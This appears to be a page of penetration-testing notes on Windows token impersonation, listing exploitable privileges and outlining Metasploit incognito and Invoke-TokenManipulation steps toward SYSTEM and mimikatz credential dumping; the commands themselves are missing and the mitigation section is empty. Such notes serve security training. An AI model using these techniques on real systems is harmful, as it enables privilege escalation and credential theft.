Token Impersonation
Token impersonation is a technique through which a Windows local administrator could steal another userโs security token in order to impersonate and effectively execute commands as that user.
That are certain privileges in Windows that, if enabled, could lead to an attacker escalating privileges to SYSTEM or any other user account with an active and valid token on that system, through various tools that have been designed to specifically exploit this vulnerability.
Exploitable Privileges
Certain privileges can be exploited to either escalate privileges directly to SYSTEM or to perform actions that are normally restricted. The privileges listed below can grant direct admin access when exploited:
Privilege | Impact | Tool |
---|---|---|
SeAssignPrimaryToken | Admin | 3rd party tool |
SeImpersonate | Admin | 3rd party tool |
SeBackupPrivilege | Admin | 3rd party tool |
SeBackup | Threat | Built-in commands |
SeCreateToken | Admin | 3rd party tool |
SeDebug | Admin | PowerShell |
SeLoadDriver | Admin | 3rd party tool |
SeRestore | Admin | PowerShell |
SeTakeOwnership | Admin | Built-in commands |
SeTcb | Admin | 3rd party tool |
full list is here:
Using Metasploit
in your meterpreter shell load incognito module:
list available tokens:
Impersonate Administrator:
Invoke-TokenManipulation
Invokes token impersonation as a domain user. If this doesn't work you can try impersonating SYSTEM and then dumping credentials using mimikatz.
As a replacement for the last command you could do, but be vary of special characters in the command like "
and '
Other Techniques
Mitigation & Detection
Last updated